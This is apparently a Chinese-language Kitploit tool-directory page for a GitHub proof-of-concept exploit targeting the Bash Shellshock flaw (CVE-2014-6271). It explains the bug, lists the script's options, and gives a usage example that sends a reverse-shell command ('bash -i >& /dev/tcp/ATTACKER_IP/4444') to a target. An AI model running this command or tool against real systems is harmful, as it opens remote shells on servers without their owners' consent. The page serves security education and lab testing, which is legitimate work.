Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 漏洞利用 | 作者:infrar3d | Kitploit
工具/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 漏洞利用 | 作者:infrar3d

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
67个月前尚未审核
分享

CVE-2014-6271 Shellshock

由 infrar3d 利用

本仓库包含针对 CVE-2014-6271(Shellshock) 的概念验证漏洞利用代码。

Shellshock 是 GNU Bash 中的一个严重漏洞,精心构造的环境变量允许执行任意命令。
当 Web 服务器将 HTTP 头部传递给调用 Bash 的 CGI 脚本时,攻击者可以通过这些头部注入命令。

使用方法:

./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	显示此消息并退出
	-a | --address	目标地址(默认为 "localhost")
	-p | --port	目标端口(默认为 80)
	-f | --file	目标文件(默认为 "/cgi-bin/shell.sh")
	-c | --command	在目标机上执行的命令(默认为 "id")

示例:

./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(已在 VulnHub 靶机 "Hacksudo - Thor" 上测试)

⚠️ 免责声明 ⚠️

本软件及概念验证代码仅提供用于教育和研究目的。

  • 作者不对因使用本程序造成的任何滥用或损害负责。
  • 不得在未经明确事先授权的情况下对任何系统使用。
  • 未经同意使用本工具攻击目标属于违法行为。

您有责任遵守所有适用法律。请合乎道德且负责任地使用。

下载工具